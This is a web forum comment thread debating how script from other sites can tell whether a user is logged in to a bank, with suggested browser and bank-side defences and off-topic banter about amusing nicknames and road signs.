If this isn't the case then I see no point in using Chrome. It means all that Chrome marketing was just fluff.

OT: great nick!

[thePowerOfGrayskull]

I am sure there are several, but I distinctly recall stopping in at a place with a sign that read "Eat Here! Get Gas!" on my way to Maine one year.

Re:OT: great nick!

[eat+here_get+gas]

i believe it was near hampton beach, on rt 1 but not near the boardwalk. i saw the sign while tokin and strolling and thought it was quite amusing (I have a picture of the place!). in yahoo i have "your_door_is_a_jar" which makes people laugh as well. used to have a script that made the accompanying annoying sound every time i entered the nh2 chatroom.

Re:OT: great nick!

[thePowerOfGrayskull]

I've always wondered if signs like that are intentional... or if people just never realized (until after the fact).

Re:OT: great nick!

[eat+here_get+gas]

well, a step further is that certain wheelchair company that has "operators standing by" to take handicapped peoples calls...

Re:OT: great nick!

[thePowerOfGrayskull]

Ow.

ProfileManager is your friend

[Mathinker]

Have you thought about using a separate Firefox profile which is only for banking? This would enable you to maintain temporal continuity in the other profile.

Re:paranoia-plus - Set A Bogus HTTP Proxy

[malloc]

Google security researcher Chris Evans has a very informative blog post which notes that to avoid attacks like this one you must set your http proxy to localhost:1 thus killing all http traffic and only letting https (to your bank) go through.

-Malloc

The bank should check the REFERER

The bank should check the REFERER header, and if it's not the bank's own site, return a 400 error.

That way, javascript loaded from another site won't be able to get information about whether the user is logged in to the banking site.

That won't work. HTTP is stateless

[MacDork]

One that does not use cookies

Web apps must track changes (user management, breadcrumbs, back links, etc) from page to page. Otherwise they are of little utility. Web apps make pages stateful by tracking a session in one of two ways: Storing session IDs in cookies or URLs. Cookies can be secured with encryption. URLs are plaintext. Session URLs are like writing your pin number on your bank card. So ... take your pick.

(There are actually other ways. But they suck worse: 1) Form value submission. *Everything* you click has to be a form with a hidden field to submit the session value... bye bye <a> tag. The forms also have to POST or the session will end up in the URL anyway ... see above. 2) Javascript cookies... need I say more? 3) Flash cookies... I think other posters have already pointed out security flaws in this approach 4) some other approach with huge drawbacks? )

Noscript Is Pretty Much Geek-Only

[reallocate]

Noscript requires a level of knowledge about attacks, protocols, etc., that precludes it from being adopted outside the geek community.

A tool intended for widespread use needs to have two buttons: Safe and Unsafe.

Re:Noscript Is Pretty Much Geek-Only

[zarlino]

You mean ONE button

Re:Noscript Is Pretty Much Geek-Only

[stickrnan]

Unfortunately without knowledge of how an attack might take place, most users will simply permanently allow every site that comes their way.

Re:Noscript Is Pretty Much Geek-Only

[StuartHankins]

Unfortunately people will just learn to push the "unsafe" button anytime they wanted something.

Can't get your porn? (pushes unsafe button)

Can't see that video? (pushes unsafe button)

OOH! RINGTONES! (pushes unsafe button)

The problem is not only with making a solution widely distributed and easy to use, but also educating people so they understand why they need to open that gaping hole only when they really really really trust the machine on the other side.

The people I know seem unfazed and unconcerned when you tell them their ass is flapping in the breeze.

Meh

I don't have enough money to care about banking scams.

Google Chrome tabs

Google Chrome creates a separate session in each tab. How would the malicious javascript in one tab know about the separate session in another tab?

Further OT:Signs

My dad and I were driving through Alaska about 15 years ago. We passed a sign on the highway advertising "Skinny Dick's Halfway Inn." It had been a long haul, and we weren't very sharp, so we'd already passed it by the time it sunk in (no pun intended). I wish we had gone back to get a picture.

NoScript - the banking site stops working

Yes, it is stupid but there are banking sites that use java script and don't work if you disable it.

Re:paranoia-plus - Set A Bogus HTTP Proxy

[kdemetter]

That's not 100% secure : an attacker could install a proxy on your machine on port 1 , thus breaking your security principle.

Re:paranoia-plus - Set A Bogus HTTP Proxy

[malloc]

Uh, if an attacker can install a proxy on your machine on privileged port then you've got a whole lot more problems than browser security.

This discussion is about a *secure* machine getting taken in by extraneous http requests. The technique above blocks them.

Issue: a need to authenticate the BANK as well..

The common problem with all these so-called "security" devices is that they authenticate you to some degree, but not the originating bank. The RSA one time password gadget simply churns out numbers, but you have no idea if you're giving this to a Man in the Middle pretending to be you or the actual bank. The challenge-response gadgets (which is what you are talking about) challenges YOU, but you can't challenge the bank (although this ought to be theoretically possible) so again not quite Man in the Middle(/Browser) proof.

You have NO idea if you're actually looking at the bank - even assuming your client has a clue where to look to check it is still possible to make a mess of things in the browser. The idea of using SSL as site identification as well as carrier security has never been foolproof, and the average end user is OK if you just show them a PICTURE of a padlock on the page. Sigh.

The gadgets you have to install (USB keys et al) rely to a degree on the client system being at least safe or unable to affect the transmission, and the new Swiss IBM ZTIC is about the only one of those "installables" that has at least some authenticated channel - but has zip to ensure the actual user is using it. So it gets the transport right, but not the user verification (AFAIK, I haven't had it in my hands yet)..

it's the ":visited" pseudoclass trick

[undisclosedrecipient]

The hack seems already quite old now, I found this 3-years old post : http://it.toolbox.com/blogs/puramu/javascript-hack-to-display-your-browsing-history-12694 Proof of concept : http://ha.ckers.org/weird/CSS-history.cgi

Re:Issue: a need to authenticate the BANK as well.

[LM-Els]

You have NO idea if you're actually looking at the bank - even assuming your client has a clue where to look to check it is still possible to make a mess of things in the browser.

You are saying that even when I see the padlock, *and* the correct URL in the browser, *and* the details of transactions I know to be mine over the last years, I could still be looking at a 'middle man' instead of at my own bank?

Even if so, one of my banks is sending the confirmation codes to my mobile phone, so an attacker would have to have my internet connection, my phone, and my brain. Still hackable?

What, not everyone has JS enabled?

Don't even get me started on ASP.Net or whatever it's called this month - it absolutely, positively REQUIRES Javascript on browser side, else that idiotic __doPostBack (which, btw, is attached to everything) will break. Yeah, yeah, I'm sure you could persuade it not to, but it probably involves black candles and a goat - at least, that's my assumption from the JS/non-JS ASP.net sites' frequency distribution. And get off my lawn, too!